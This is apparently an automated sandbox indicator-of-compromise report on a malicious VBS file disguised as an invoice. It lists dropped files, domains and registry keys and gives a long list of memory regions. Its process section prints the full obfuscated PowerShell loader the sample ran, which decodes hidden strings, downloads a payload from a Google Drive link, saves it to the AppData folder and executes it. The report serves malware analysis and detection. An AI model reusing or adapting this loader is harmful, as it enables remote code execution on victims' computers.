IOC Report
FACTURA24021151 - BP.vbs

loading gif

Files

File Path
Type
Category
Malicious
FACTURA24021151 - BP.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e325cqtp.nie.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkgsi2od.zzf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\microdactylous.Aar
HTML document, ASCII text, with very long lines (1692), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelRecipuPomacmH.tetpYvo,n.KommiHPathoe SupeaEjenddDialyeProbarAggrasCompo[Fiske$Orbi MVinteaDekorsDiktek.ommaiOrthonUnsetkPagino .ntadVarleeIngrarOversnspille B ss]Anten= Sty,$TalmuH SalseUn.ecl.ampyt RegeaBronzlPell,skofoedDerm i ProjvA.egrideflos Kreei nogtoAlpehn Perisarbe. ');$Catholicly=Fjter 'App,aoGen,nv HjoreBesoiruredtp,astrl Libeuoeve mVievapVaren.OvergDSy,enoH,lmewV,dtlnDyrehlStadso,egisasammedAriusF .ektitu erlUnr ge,poke(Solen$.olleEBoundx,ostrePrsennGrittcPreheeRottep Div,hSociaa yvel NoncuVic,is Idea,Feltt$GenspHPr vim Ratin FeweiForebn El,mgraads5 Part6Kaste) anus ';$Catholicly=$Fjerdedelsnoderne[1]+$Catholicly;$Hmning56=$Fjerdedelsnoderne[0];Jardiniere (Fjter 'Helfa$ B,skg ionol Baa,oBandobDynebaIndkolRoman:Qui zUMembrnChorad ReeteDrypsrprot k Op keUlvemnTensidUbu.deSputtlCanoes Be.keS rofsB ndb=Forto(AchloTAndedeCot esAandstEncli-ChaotPKat gaOplritMacrohS eti Pr.a$Art,yH FejlmIso.onFossiiQu.ntnT.ctog Reg 5Growt6Shirt) Stri ');while (!$Underkendelses) {Jardiniere (Fjter ' For.$ BasigAgatil .olioArchebfagotawalk,lSakes:KrimiCSkar,aVelafu Ek olidoliiLitigcNedruuBhutslBrevti skov=Relfo$Apocot,iscjr prinuProtoeAstri ') ;Jardiniere $Catholicly;Jardiniere (Fjter ' ntaiSRigsatAttriaAn.ierLoggetFiltr-Unp,lSWarkhlEftere etekeArbejp Linj Kawik4Inapp ');Jardiniere (Fjter ' ,ika$SylfigTeletlHemi o patlbKasi aCruellMestr: LeylUCholen Phl,d CinteRevaprOolitk G,ldeAkvarnN dvudP,ayeeExtenlam.trsA moceRekursFre.m=Dan.e(K imiTSun.oeColopsB andtBox u- AlloPB,odaaregult efeuhCun i aggra$ Kos,H,ynelmEmbryn ArthiMandsn BlesgLight5Indka6Sikke)Tilhr ') ;Jardiniere (Fjter 'Vurde$JernbgStrabl issoUnderb torfa BlomlU,nst:EskalTR ulerErgonidispohAffaleBrillmSpar iLoreno ZoopbDamevo,ursulSmattiS.aveoFinannTauro=Disfu$Racemg M.lilTegneoMagnebsagfraBeslulFissi: BrukR s ame,eilekBiblir and eZygo.e Stjer Asyne everdAcce.eH,rbw+Besky+Under%Lisss$TungmG,reska Ru.lnCockpgBannsrOligoe,olypl.hyto.GavstcSociaoRakkeuS ikanBil at Drak ') ;$Exencephalus=$Gangrel[$Trihemiobolion];}Jardiniere (Fjter 'Repar$DemargSunscl BideoGlycob Chuma Cl.cl Natu:.tninGAlminaSext.l Udpaa aadncStevetBanjeoMetabpAdverh Ps,cl ryggeAculebSurwaiOctaht B.azi,estrsMa.lg Afpud=Spe,i OpbygG Kirke,orspt Subh- DjrvCIntero Se,inOvergtFortjePar nnSk.altRece xtr$TumblHlibermHelafnMa olia.tranCordigInt.r5Uddat6Epita ');Jardiniere (Fjter 'Bundf$OutrogJuniolBizaroBesvrb St,ra,urfulTykta: ibizOMonilpBittedOverta VenatS.edieInforrDerobi Aftan Jul gD,stas AdvooRhi or SenddkonjanEsplaiCon.inLnintgeige.1 Ren 3 Kr,g7 Sk.a monos= Ful, Ceme[ lassSOpbl ySmartsD.osctKatj.esu scmStor,.RddikCExamioSlsetnIndbrv Dis eBook.r UdvitSent,]Repr.: Dope:PummeFSummarCarmoo ExodmFlintBAr ejaPyo.es Aeroe sang6 Over4BestrSFamilt SondrFertii PolenBypasgHala,(Ratfi$Gi miGMitisaHo,osl BalaaKontocBnkbltSkibboBostop,randhFrem.l Ca.te c,ilb NewbiEmbartEvindi,sychs Cao,)Betal ');Jardiniere (Fjter 'Lid,b$ConstgSweatlMinasoScripbHoveraU derl Ka,r:Mili.FCarlsu.efallCa,hedBushtgBadeloUre,mdLyk.seResen2 Mam 4 Ov,r4Imma H art=Phlog Mn.de[BindeSDrasty DetusSkilltHo.ogeRullemKnown.Omty Tasylre HellxSli.etHo ed.,ygniESeamsnDeserc UnreoFornidS mmeibestnnGrammg P ni]Unint:Recen:BrnevABorstSditikC Raa,IBourgI For . lfenGplanaePre.rtFore.SUndertQuodlr SulfiBesm.nVitalg Sger(Snigg$Sul.aODepilpUds,rdDidacaUler t Dapie Brsnr MaltiTr.konUndergSquansK,oldoAnticrAnteddSydafnCharsi,nplan bus,g Awa,1Kunde3 Plat7Dyref)Ouden ');Jardiniere (Fjter 'Endev$TheregskriglPinnaoEfterb Ext aFrikel Efte: SagsBEpikujInspae hy.rr Unc.gsundhe rat rGnomos,augh=Fo de$SammeFSuppeuKrantlSnobodDetong ,ervoBrochdUnreceSlaae2 Soli4 Se v4Stueg. Met sPol.tuFor ubSulphs CondtTilfarBestriUndernT aadgSpurv(Huski3Semes2haras7Frime1Ra en6Ind p4Erant, Ajou2Lath 7cring1Amora9Gluie6Koble) Muni ');Jardiniere $Bjergers;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://drive.google.comP
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
173.194.219.101
drive.usercontent.google.com
142.251.15.132

IPs

IP
Domain
Country
Malicious
142.251.15.132
drive.usercontent.google.com
United States
173.194.219.101
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1B413723000
heap
page read and write
1B4135A9000
heap
page read and write
1B4137C6000
heap
page read and write
1B4136DD000
heap
page read and write
1B4136C0000
heap
page read and write
2B8429E1000
heap
page read and write
1B413706000
heap
page read and write
1B4139BF000
heap
page read and write
1B4139D6000
heap
page read and write
1B413B70000
remote allocation
page read and write
1B411788000
heap
page read and write
1B4136BB000
heap
page read and write
1B4135C8000
heap
page read and write
1B41370B000
heap
page read and write
1B413581000
heap
page read and write
1BEBE7AB000
heap
page read and write
1B413701000
heap
page read and write
1B413579000
heap
page read and write
DAA8E77000
stack
page read and write
1B413575000
heap
page read and write
1B413780000
heap
page read and write
2B8289F0000
heap
page read and write
1B4136D5000
heap
page read and write
1B4117C0000
heap
page read and write
1BEBE7A0000
heap
page read and write
1B41359B000
heap
page read and write
1B413713000
heap
page read and write
2B828AA0000
trusted library allocation
page read and write
1B413C41000
heap
page read and write
1B41356A000
heap
page read and write
7987CFB000
stack
page read and write
1B413BA1000
heap
page read and write
1B4139CD000
heap
page read and write
1B4117AF000
heap
page read and write
2B82C591000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
2B82C498000
trusted library allocation
page read and write
1B4136C0000
heap
page read and write
1B41381D000
heap
page read and write
2B828845000
heap
page read and write
2B83A93D000
trusted library allocation
page read and write
2B82C68E000
trusted library allocation
page read and write
1B4135F5000
heap
page read and write
1B4135E4000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
1B4135C6000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
1B41381D000
heap
page read and write
1B411828000
heap
page read and write
2B82BF09000
trusted library allocation
page read and write
2B83A660000
trusted library allocation
page read and write
1B4135BE000
heap
page read and write
1B41381D000
heap
page read and write
1B4137F3000
heap
page read and write
1B4139BD000
heap
page read and write
DAA87DE000
stack
page read and write
1B4116C0000
heap
page read and write
1B4135A7000
heap
page read and write
1B4137FE000
heap
page read and write
1B413790000
heap
page read and write
1B4139CD000
heap
page read and write
2B842B6C000
heap
page read and write
1B413550000
heap
page read and write
1B4137DB000
heap
page read and write
1B4135F0000
heap
page read and write
2B82AAD3000
trusted library allocation
page read and write
1BEBE5E0000
heap
page read and write
2B82AF32000
trusted library allocation
page read and write
1B4138FA000
heap
page read and write
2B82AAC8000
trusted library allocation
page read and write
1B4136C0000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
2B82AB43000
trusted library allocation
page read and write
2B842AC0000
heap
page read and write
79873FE000
stack
page read and write
1B413701000
heap
page read and write
1B413592000
heap
page read and write
DAA8A7E000
stack
page read and write
1B4139A5000
heap
page read and write
1B41176A000
heap
page read and write
1B4137CE000
heap
page read and write
1B4135F8000
heap
page read and write
DAA8FFE000
stack
page read and write
7FF848E10000
trusted library allocation
page read and write
2B828853000
heap
page read and write
1B413751000
heap
page read and write
7987AFE000
stack
page read and write
7FF849080000
trusted library allocation
page read and write
1B413AD4000
heap
page read and write
1B4137EE000
heap
page read and write
1B4139C4000
heap
page read and write
1B41398A000
heap
page read and write
1B41184E000
heap
page read and write
2B82A877000
trusted library allocation
page read and write
1B413981000
heap
page read and write
1B413769000
heap
page read and write
2B82AADB000
trusted library allocation
page read and write
1B4139C4000
heap
page read and write
7FF848FF2000
trusted library allocation
page read and write
1B4139C4000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
1B4136BC000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
1B4137F6000
heap
page read and write
1B4135DF000
heap
page read and write
1B413586000
heap
page read and write
1B4136A7000
heap
page read and write
DAA8C7E000
stack
page read and write
1B41359A000
heap
page read and write
1B4136A7000
heap
page read and write
1BEBE6E0000
heap
page read and write
1B4135F5000
heap
page read and write
1B413950000
heap
page read and write
7987BFE000
stack
page read and write
2B82A400000
heap
page read and write
1BEBE6C0000
heap
page read and write
2B82C403000
trusted library allocation
page read and write
1B4137EB000
heap
page read and write
1B411765000
heap
page read and write
1B413200000
heap
page read and write
1B4139AD000
heap
page read and write
7FF848E12000
trusted library allocation
page read and write
7DF4E6CD0000
trusted library allocation
page execute and read and write
DAA90FE000
stack
page read and write
1B413576000
heap
page read and write
2B82AB3F000
trusted library allocation
page read and write
1B4136DD000
heap
page read and write
2B82C3FF000
trusted library allocation
page read and write
1B4137CB000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
1B41365F000
heap
page read and write
2B82AAEC000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
1B41359F000
heap
page read and write
1B4139AD000
heap
page read and write
1B4136EA000
heap
page read and write
1B41355A000
heap
page read and write
2B82C7A4000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
1B413709000
heap
page read and write
1B4137FB000
heap
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
2B82AABF000
trusted library allocation
page read and write
1B413759000
heap
page read and write
1B411768000
heap
page read and write
1B4139AD000
heap
page read and write
1B4136BA000
heap
page read and write
1B4135AA000
heap
page read and write
1B4135C3000
heap
page read and write
1B41399C000
heap
page read and write
1B413989000
heap
page read and write
2B82A4FF000
heap
page read and write
1B4136F0000
heap
page read and write
1B4136B0000
heap
page read and write
1B4136D5000
heap
page read and write
1B413AD4000
heap
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
2B828B30000
heap
page execute and read and write
2B828B37000
heap
page execute and read and write
2B82884D000
heap
page read and write
1B4135F4000
heap
page read and write
1B41358E000
heap
page read and write
1B4135D3000
heap
page read and write
79875FF000
stack
page read and write
1B413551000
heap
page read and write
1B413551000
heap
page read and write
2B842B37000
heap
page read and write
2B83A805000
trusted library allocation
page read and write
1B4139CD000
heap
page read and write
2B82C417000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
1B413815000
heap
page read and write
1B4135B2000
heap
page read and write
1B41359C000
heap
page read and write
2B82A4E4000
heap
page read and write
79877FB000
stack
page read and write
1B4135F6000
heap
page read and write
1B4137B2000
heap
page read and write
2B82A455000
heap
page read and write
2B82B932000
trusted library allocation
page read and write
1B4138FA000
heap
page read and write
1B4137AF000
heap
page read and write
7FF848FCA000
trusted library allocation
page read and write
1B4135F9000
heap
page read and write
1B413703000
heap
page read and write
1B4135F8000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
DAA879E000
stack
page read and write
1B413586000
heap
page read and write
1B413972000
heap
page read and write
1B413572000
heap
page read and write
2B82C43D000
trusted library allocation
page read and write
DAA917B000
stack
page read and write
DAA8693000
stack
page read and write
1B411864000
heap
page read and write
1B41381D000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
2B82AAD7000
trusted library allocation
page read and write
1B4139A8000
heap
page read and write
2B82AECB000
trusted library allocation
page read and write
1B413995000
heap
page read and write
1B413650000
heap
page read and write
2B842B21000
heap
page read and write
1B4135F5000
heap
page read and write
2B82AB01000
trusted library allocation
page read and write
1BEBE9D5000
heap
page read and write
2B8288F1000
heap
page read and write
1B413575000
heap
page read and write
1B41359C000
heap
page read and write
1B4139A8000
heap
page read and write
1B4139B9000
heap
page read and write
1B4136BC000
heap
page read and write
2B82C42A000
trusted library allocation
page read and write
1B41380E000
heap
page read and write
1B4137A8000
heap
page read and write
1B41185D000
heap
page read and write
1B413680000
heap
page read and write
1B41380E000
heap
page read and write
DAA8EFC000
stack
page read and write
2B82C426000
trusted library allocation
page read and write
1B413BA0000
heap
page read and write
1B4135F5000
heap
page read and write
2B828B40000
heap
page read and write
1B41375C000
heap
page read and write
1B41381D000
heap
page read and write
1B4139AD000
heap
page read and write
1B41377D000
heap
page read and write
1B413553000
heap
page read and write
2B82A40A000
heap
page read and write
41FF2FF000
unkown
page read and write
1B4135AF000
heap
page read and write
1B413A60000
heap
page read and write
1B413553000
heap
page read and write
1B413586000
heap
page read and write
1B413774000
heap
page read and write
2B828A60000
trusted library allocation
page read and write
1B4139B9000
heap
page read and write
1BEBE9D4000
heap
page read and write
DAA8CFE000
stack
page read and write
1B413A11000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
2B828A20000
heap
page read and write
2B842DD0000
heap
page read and write
2B828851000
heap
page read and write
1B4137D6000
heap
page read and write
1B4135CB000
heap
page read and write
2B82AACA000
trusted library allocation
page read and write
1B4137A0000
heap
page read and write
2B828817000
heap
page read and write
1B4136B0000
heap
page read and write
1B4117B6000
heap
page read and write
2B82A640000
heap
page execute and read and write
DAA8B7D000
stack
page read and write
1B4135BB000
heap
page read and write
1B4136C0000
heap
page read and write
1B4136BC000
heap
page read and write
1B4136F0000
heap
page read and write
41FEF9D000
stack
page read and write
1B4135F8000
heap
page read and write
1B4137E6000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
1B4116E0000
heap
page read and write
2B828800000
heap
page read and write
1B41176C000
heap
page read and write
DAA9B4E000
stack
page read and write
1B41356D000
heap
page read and write
2B82A4C0000
heap
page read and write
1B413764000
heap
page read and write
1B413651000
heap
page read and write
1B413565000
heap
page read and write
1B4135F8000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
1B411780000
heap
page read and write
2B82A2F9000
heap
page read and write
2B83A651000
trusted library allocation
page read and write
7986FA9000
stack
page read and write
1B4136BC000
heap
page read and write
1B411864000
heap
page read and write
2B83A94C000
trusted library allocation
page read and write
2B8287E0000
heap
page read and write
1B41378D000
heap
page read and write
1B4135F8000
heap
page read and write
1B413B70000
remote allocation
page read and write
1B413572000
heap
page read and write
1B413795000
heap
page read and write
1B4135A2000
heap
page read and write
1B4136F8000
heap
page read and write
1B4135F5000
heap
page read and write
DAA907E000
stack
page read and write
2B83A6C3000
trusted library allocation
page read and write
1B41176E000
heap
page read and write
1B4137AD000
heap
page read and write
1B4137D3000
heap
page read and write
1B4136C0000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
1B4135E1000
heap
page read and write
1B4136BC000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
1B4136EA000
heap
page read and write
1B4135F8000
heap
page read and write
1B4137E3000
heap
page read and write
1B41355D000
heap
page read and write
1B413597000
heap
page read and write
1B413B70000
remote allocation
page read and write
1B413708000
heap
page read and write
2B842D30000
heap
page read and write
1B41185D000
heap
page read and write
1B413557000
heap
page read and write
1B4139BF000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
2B828B10000
trusted library allocation
page read and write
1B413AC9000
heap
page read and write
2B82A54E000
heap
page read and write
1B413ACB000
heap
page read and write
1B4135B9000
heap
page read and write
1B41379D000
heap
page read and write
1B4137B7000
heap
page read and write
1B413602000
heap
page read and write
1B413761000
heap
page read and write
DAA8AFE000
stack
page read and write
41FF3FF000
stack
page read and write
1B4137B2000
heap
page read and write
1B41365F000
heap
page read and write
1B4137BA000
heap
page read and write
1B4136D5000
heap
page read and write
1B4136D5000
heap
page read and write
1B413953000
heap
page read and write
1B4135CE000
heap
page read and write
1B413A34000
heap
page read and write
1B413750000
heap
page read and write
2B82C422000
trusted library allocation
page read and write
1B413560000
heap
page read and write
2B842990000
heap
page execute and read and write
1B4139CD000
heap
page read and write
1B4136C0000
heap
page read and write
1B413585000
heap
page read and write
1B4117B5000
heap
page read and write
1BEBE9D0000
heap
page read and write
1B4135F5000
heap
page read and write
2B82A53B000
heap
page read and write
1B413785000
heap
page read and write
1B413575000
heap
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
1B4136BC000
heap
page read and write
1B4136D8000
heap
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
1B4136B0000
heap
page read and write
1B4136F0000
heap
page read and write
1B41357B000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
1B413754000
heap
page read and write
1B413AD4000
heap
page read and write
1B41358F000
heap
page read and write
1B4139C4000
heap
page read and write
79878FC000
stack
page read and write
1B41376C000
heap
page read and write
7FF848E2B000
trusted library allocation
page read and write
1B4136DB000
heap
page read and write
1B411862000
heap
page read and write
1B4136EA000
heap
page read and write
1B4135D7000
heap
page read and write
79872FE000
stack
page read and write
2B842B08000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
1B413807000
heap
page read and write
1B4139D4000
heap
page read and write
1B413562000
heap
page read and write
1B413561000
heap
page read and write
1B4136D5000
heap
page read and write
1B413C42000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
1B4135DC000
heap
page read and write
1B4139AD000
heap
page read and write
DAA871D000
stack
page read and write
7FF848E14000
trusted library allocation
page read and write
1B4136EA000
heap
page read and write
1B4136D5000
heap
page read and write
2B82A460000
heap
page read and write
1B411760000
heap
page read and write
1B41357E000
heap
page read and write
2B82A523000
heap
page read and write
2B828A90000
heap
page readonly
7FF848FC1000
trusted library allocation
page read and write
1B4138FA000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
1B4136D8000
heap
page read and write
1B4137DE000
heap
page read and write
1B4135D1000
heap
page read and write
1B413788000
heap
page read and write
DAA8BFE000
stack
page read and write
79876FF000
stack
page read and write
1B41365F000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
1B411838000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
2B828A80000
trusted library allocation
page read and write
DAA8D79000
stack
page read and write
1B413576000
heap
page read and write
1B4116B0000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1B4135F5000
heap
page read and write
1B4136D5000
heap
page read and write
1BEBE8A0000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
2B82A450000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
2B8429C0000
heap
page read and write
1B413771000
heap
page read and write
1B413803000
heap
page read and write
2B828B45000
heap
page read and write
2B842AC9000
heap
page read and write
1B413589000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
DAA8DF7000
stack
page read and write
1B413798000
heap
page read and write
1B4137C3000
heap
page read and write
1B413747000
heap
page read and write
2B82C494000
trusted library allocation
page read and write
2B82A651000
trusted library allocation
page read and write
DAA8F7E000
stack
page read and write
2B828865000
heap
page read and write
2B8289D0000
heap
page read and write
1B413813000
heap
page read and write
1B4139E5000
heap
page read and write
1B4135F8000
heap
page read and write
1B4137A5000
heap
page read and write
1B4117B6000
heap
page read and write
1B4117B0000
heap
page read and write
1B411857000
heap
page read and write
1B4136F0000
heap
page read and write
DAA9C4D000
stack
page read and write
7FF849060000
trusted library allocation
page read and write
DAA9BCF000
stack
page read and write
7FF849140000
trusted library allocation
page read and write
2B82888E000
heap
page read and write
1B41176E000
heap
page read and write
2B82A6D6000
trusted library allocation
page read and write
2B828AD0000
trusted library allocation
page read and write
1B413593000
heap
page read and write
1B411864000
heap
page read and write
1B4135E7000
heap
page read and write
2B82C457000
trusted library allocation
page read and write
1B4136C0000
heap
page read and write
There are 437 hidden memdumps, click here to show them.